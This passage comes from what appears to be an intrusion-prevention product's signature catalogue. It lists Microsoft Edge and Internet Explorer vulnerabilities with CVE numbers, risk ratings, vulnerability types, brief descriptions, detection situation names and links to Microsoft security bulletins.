File-Exe_Microsoft-Edge-Elevation-of-Privilege-CVE-2019-0566

References:

CVE-2019-0566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0566

ms19-jan
http://technet.microsoft.com/security/bulletin/ms19-jan

Microsoft-Edge-Frame-Elements-Same-Origin-Policy-Bypass

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-872-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a security policy bypass vulnerability in Microsoft Edge. A remote attacker can use this to disclose sensitive information.

Situation:

File-Text_Microsoft-Edge-Frame-Elements-Same-Origin-Policy-Bypass

References:

CVE-2017-0066
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0066

MS17-007
http://technet.microsoft.com/security/bulletin/MS17-007

Microsoft-Edge-Information-Disclosure-CVE-2018-8545

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1115-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Information-Disclosure-CVE-2018-8545

References:

CVE-2018-8545
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8545

ms18-nov
http://technet.microsoft.com/security/bulletin/ms18-nov

Microsoft-Edge-Information-Disclosure-Vulnerability-CVE-2016-3277

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-777-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Edge

Type:

Input Validation

Description:

There exists an information disclosure vulnerability in Microsoft Edge.

Situation:

File-Text_Microsoft-Edge-Information-Disclosure-Vulnerability-CVE-2016-3277

References:

CVE-2016-3277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3277

MS16-085
http://technet.microsoft.com/security/bulletin/MS16-085

Microsoft-Edge-InstanceOf-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1150-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

A vulnerability in Microsoft Edge Chakra JavaScript Engine which allows remote attackers to execute arbitrary code by sending a specially crafted web page or document, due to insufficient validation of objects within the Js::JavascriptTypedObjectSlotAccessorFunction::InstanceOf() function.

Situation:

File-Text_Microsoft-Edge-InstanceOf-Type-Confusion

References:

CVE-2018-0893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0893

Microsoft-Edge-JavaScript-Engine-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-769-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Edge Chakra JavaScript Engine. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-JavaScript-Engine-Array.unshift-Method-Memory-Corruption
File-Text_Microsoft-Edge-JavaScript-Engine-Array.shift-Method-Memory-Corruption

References:

CVE-2016-0186
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0186

MS16-052
http://technet.microsoft.com/security/bulletin/MS16-052

Microsoft-Edge-Memory-Corruption-CVE-2016-0024

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-720-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

A vulnerability in Microsoft Edge.

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2016-0024

References:

CVE-2016-0024
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0024

MS16-002
http://technet.microsoft.com/security/bulletin/MS16-002

Microsoft-Edge-Memory-Corruption-CVE-2016-3199

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-770-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Edge.

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2016-3199

References:

CVE-2016-3199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3199

MS16-068
http://technet.microsoft.com/security/bulletin/MS16-068

Microsoft-Edge-Memory-Corruption-CVE-2016-3222

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-770-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Edge.

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2016-3222

References:

CVE-2016-3222
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3222

MS16-068
http://technet.microsoft.com/security/bulletin/MS16-068

Microsoft-Edge-Memory-Corruption-CVE-2016-3271

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-777-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Edge

Type:

Buffer Overflow

Description:

A vulnerability in Microsoft Edge

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2016-3271

References:

CVE-2016-3271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3271

MS16-085
http://technet.microsoft.com/security/bulletin/MS16-085

Microsoft-Edge-Memory-Corruption-CVE-2017-0010

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A privilege escalation vulnerability in Microsoft Edge.

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2017-0010

References:

CVE-2017-0010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0010

MS17-007
http://technet.microsoft.com/security/bulletin/MS17-007

Microsoft-Edge-Memory-Corruption-CVE-2017-0141

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-863-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A privilege escalation vulnerability in Microsoft Edge.

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2017-0141

References:

CVE-2017-0141
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0141

MS17-007
http://technet.microsoft.com/security/bulletin/MS17-007

Microsoft-Edge-Memory-Corruption-CVE-2018-0980

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1057-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Input Validation

Description:

There exists a memory corruption vulnerability in the Chakra scripting engine in Microsoft Edge. A succesful exploit could lead to remote code execution in the security context of the current user.

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2018-0980

References:

CVE-2018-0980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0980

ms18-apr
http://technet.microsoft.com/security/bulletin/ms18-apr

Microsoft-Edge-Memory-Corruption-CVE-2018-8110

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2018-8110

References:

CVE-2018-8110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8110

ms18-jun
http://technet.microsoft.com/security/bulletin/ms18-jun

Microsoft-Edge-Memory-Corruption-CVE-2018-8111

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2018-8111

References:

CVE-2018-8111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8111

ms18-jun
http://technet.microsoft.com/security/bulletin/ms18-jun

Microsoft-Edge-Memory-Corruption-CVE-2018-8236

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-CVE-2018-8236

References:

CVE-2018-8236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8236

ms18-jun
http://technet.microsoft.com/security/bulletin/ms18-jun

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2016-0191

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-762-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Edge.

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2016-0191

References:

CVE-2016-0191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0191

MS16-052
http://technet.microsoft.com/security/bulletin/MS16-052

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0758

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1029-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Buffer Overflow

Description:

There has been reported a scripting engine memory corruption vulnerability in Microsoft Edge. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0758

References:

CVE-2018-0758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0758

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0762

About this vulnerability:

A vulnerability in Microsoft Edge and Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1029-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge; Internet Explorer 11.0; Internet Explorer 10.0; Internet Explorer 9.0

Type:

Buffer Overflow

Description:

There has been reported a scripting engine memory corruption vulnerability in Microsoft Internet Explorer and Edge. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0762

References:

CVE-2018-0762
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0762

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0777

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1029-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Buffer Overflow

Description:

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0777

References:

CVE-2018-0777
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0777

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0872

About this vulnerability:

A vulnerability in Microsoft Edge and Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1050-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Use-after-free

Description:

There has been reported a scripting engine memory corruption vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0872

References:

CVE-2018-0872
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0872

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0874

About this vulnerability:

A vulnerability in Microsoft Edge and Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1050-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0874

References:

CVE-2018-0874
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0874

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0889

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1050-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Heap Overflow

Description:

There has been reported a scripting engine memory corruption vulnerability in Microsoft Internet Explorer browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0889

References:

CVE-2018-0889
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0889

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0893

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1050-5242

Last changed:

sgpkg-ips-1731-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Type Confusion

Description:

Situation:

File-Text_Microsoft-Edge-InstanceOf-Type-Confusion

References:

CVE-2018-0893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0893

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0930

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1050-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0930

References:

CVE-2018-0930
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0930

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0933

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1050-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0933

References:

CVE-2018-0933
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0933

Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0934

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1050-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Type Confusion

Description:

Situation:

File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0934

References:

CVE-2018-0934
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0934

Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2018-8137

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-1065-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Input Validation

Description:

There has been reported an out-of-bounds vulnerability in Microsoft Edge browser. A remote attacker could exploit this vulnerability by having a target user open a maliciously crafted document. Successful exploitation could lead to remote code execution.

Situation:

File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2018-8137

References:

CVE-2018-8137
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8137

ms18-may
http://technet.microsoft.com/security/bulletin/ms18-may

Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0610

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists an out of bounds write vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0610

References:

CVE-2019-0610
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0610

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0644

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists an out of bounds write vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0644

References:

CVE-2019-0644
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0644

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0648

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists an out of bounds write vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0648

References:

CVE-2019-0648
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0648

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0652

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists an out of bounds write vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0652

References:

CVE-2019-0652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0652

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0658

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1132-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists an out of bounds write vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.

Situation:

File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0658

References:

CVE-2019-0658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0658

ms19-feb
http://technet.microsoft.com/security/bulletin/ms19-feb

Microsoft-Edge-PDF-Remote-Code-Execution-CVE-2018-8464

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1101-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists an out of bound write vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-PDF_Microsoft-Edge-PDF-Remote-Code-Execution-CVE-2018-8464

References:

CVE-2018-8464
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8464

ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep

Microsoft-Edge-PreVisitCatch-Uninitialized-Memory-Use

About this vulnerability:

A Microsoft Edge PreVisitCatch Uninitialized Memory Use vulnerability

Risk:

High

First detected in:

sgpkg-ips-983-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

A vulnerability in Microsoft Edge which allows remote attackers to execute arbitrary code, due to improper initialization of a variable within the DefineUserVars() function and an error in PreVisitCatch().

Situation:

File-Text_Microsoft-Edge-PreVisitCatch-Uninitialized-Memory-Use

References:

CVE-2017-8656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8656

Microsoft-Edge-Profiledldelem-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-866-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Profiledldelem-Type-Confusion

References:

CVE-2017-0071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0071

MS17-007
http://technet.microsoft.com/security/bulletin/MS17-007

Microsoft-Edge-RCE-CVE-2017-0227

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-900-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Edge. A successful exploitation could allow the attacker to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-RCE-CVE-2017-0227

References:

CVE-2017-0227
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0227

ms17-may
http://technet.microsoft.com/security/bulletin/ms17-may

Microsoft-Edge-RCE-CVE-2017-0228

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-900-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Edge. A successful exploitation could allow the attacker to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-RCE-CVE-2017-0228

References:

CVE-2017-0228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0228

ms17-may
http://technet.microsoft.com/security/bulletin/ms17-may

Microsoft-Edge-RCE-CVE-2017-0236

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-900-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Edge. A successful exploitation could allow the attacker to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-RCE-CVE-2017-0236

References:

CVE-2017-0236
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0236

ms17-may
http://technet.microsoft.com/security/bulletin/ms17-may

Microsoft-Edge-RCE-CVE-2017-0238

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-900-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Edge. A successful exploitation could allow the attacker to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-RCE-CVE-2017-0238

References:

CVE-2017-0238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0238

ms17-may
http://technet.microsoft.com/security/bulletin/ms17-may

Microsoft-Edge-RCE-CVE-2017-0240

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-900-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a remote code execution vulnerability in Microsoft Edge. A successful exploitation could allow the attacker to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-RCE-CVE-2017-0240

References:

CVE-2017-0240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0240

ms17-may
http://technet.microsoft.com/security/bulletin/ms17-may

Microsoft-Edge-Remote-Code-Execution-CVE-2019-0541

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1124-5242

Last changed:

sgpkg-ips-1476-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a remote execution vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Remote-Code-Execution-CVE-2019-0541

References:

CVE-2019-0541
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0541

ms19-jan
http://technet.microsoft.com/security/bulletin/ms19-jan

Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8496

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-930-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a use after free vulnerability in Microsoft Edge. A successful exploitation could lead to remote code execution.

Situation:

File-Text_Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8496
File-Text_Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8496-2

References:

CVE-2017-8496
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8496

ms17-jun
http://technet.microsoft.com/security/bulletin/ms17-jun

Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8497

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-930-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Edge. A successful exploitation could lead to remote code execution.

Situation:

File-Text_Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8497

References:

CVE-2017-8497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8497

ms17-jun
http://technet.microsoft.com/security/bulletin/ms17-jun

Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8617

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

Moderate

First detected in:

sgpkg-ips-944-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Edge. A successful exploitation can allow a remote attacker to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8617

References:

CVE-2017-8617
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8617

ms17-jul
http://technet.microsoft.com/security/bulletin/ms17-jul

Microsoft-Edge-Scripting-Engine-CVE-2016-7240-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-824-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Edge Scripting Engine. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Scripting-Engine-CVE-2016-7240-Memory-Corruption

References:

CVE-2016-7240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7240

MS16-129
http://technet.microsoft.com/security/bulletin/MS16-129

Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8367

About this vulnerability:

A vulnerability in Microsoft Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1101-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in the scripting engine in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8367

References:

CVE-2018-8367
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8367

ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep

Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8391

About this vulnerability:

A vulnerability in Microsoft Scripting Engine

Risk:

High

First detected in:

sgpkg-ips-1101-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in the scripting engine in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8391

References:

CVE-2018-8391
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8391

ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep

Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8456

About this vulnerability:

A vulnerability in Microsoft Edge

Risk:

High

First detected in:

sgpkg-ips-1101-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Edge

Type:

Malfunction

Description:

There exists a type confusion vulnerability in Microsoft Edge. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Internet-Explorer-Memory-Corruption-CVE-2018-8456

References:

CVE-2018-8456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8456

ms18-sep
http://technet.microsoft.com/security/bulletin/ms18-sep
